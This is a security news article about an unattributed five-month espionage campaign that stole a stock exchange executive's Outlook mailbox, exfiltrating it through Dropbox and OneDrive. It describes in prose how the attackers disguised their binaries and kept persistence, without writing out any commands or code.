Attackers Stole Global Stock Exchange Executive’s Mailbox for Five Months in Covert Campaign
Published
Key Takeaways
- Five-Month Campaign: Attackers targeted a major global stock exchange senior executive's Outlook mailbox over a five-month period.
- Cloud-Based Exfiltration: Data was stolen in incremental batches through Dropbox and OneDrive Personal to blend in with legitimate traffic.
- Unattributed Espionage: Analysis says the activity cannot be linked to a known threat group, but commands used point to espionage as the motivation.
A five-month espionage campaign targeted the email account of a senior figure at a major global stock exchange, researchers say. The attackers focused exclusively on stealing the executive's Outlook mailbox, extracting and exfiltrating data in incremental batches to make the traffic indistinguishable from legitimate cloud activity.
The report asserted that the cyberespionage campaign represented long-term theft of a single Outlook mailbox via Dropbox and OneDrive Personal.
Initial Compromise, Incremental Mailbox Theft via Aspose
The first observed malicious activity occurred on October 10, 2025, when two masquerading binaries (armsvc.exe and oneservice.exe) were already installed and running as SYSTEM, according to Broadcom Symantec and Carbon Black’s Threat Hunter Team.
Both binaries impersonated legitimate services, with armsvc.exe mimicking the legitimate Adobe Acrobat Reader Update service and oneservice.exe spoofing the OneDrive setup helper. Persistence was maintained through scheduled tasks masquerading as Adobe and Lenovo services.
On November 12, 2025, the attackers completed the OAuth handshake to obtain a Dropbox API token, then uploaded data to the Dropbox content endpoint via curl. An Aspose-based mailbox stealer repeatedly extracted the target's Outlook OST into PST files through February 17, 2026.
From November 21 onward, the attackers added OneDrive Personal as a second channel, using hard-coded Microsoft IP addresses to avoid DNS queries for onedrive.live.com. A brief third channel via temp.sh was used on November 20-21 and then abandoned.
Persistence Rebuilds and Final Activity
On February 27, 2026, a new persistence anchor was added via onedrivesync.exe, masquerading as the OneDrive sync service. Lastly, on March 19, the hackers added a DLL named to plausibly side-load against Microsoft Test Engine to an Intel-themed staging directory.
The use of public tools and cloud infrastructure prevented attribution to any known attack group.
Last month, Cloud Atlas APT targeted Russia and Belarus government and diplomatic entities with the PowerCloud tool, and suspected Belarusian state-nexus actors targeted Ukraine with a new Cobalt Strike cyberespionage campaign.
Related
Get expert insights on threats, breaches, scams, and security trends — delivered every Monday.
Most Popular
Get expert insights on threats, breaches, scams, and security trends — delivered every Monday.
Most Popular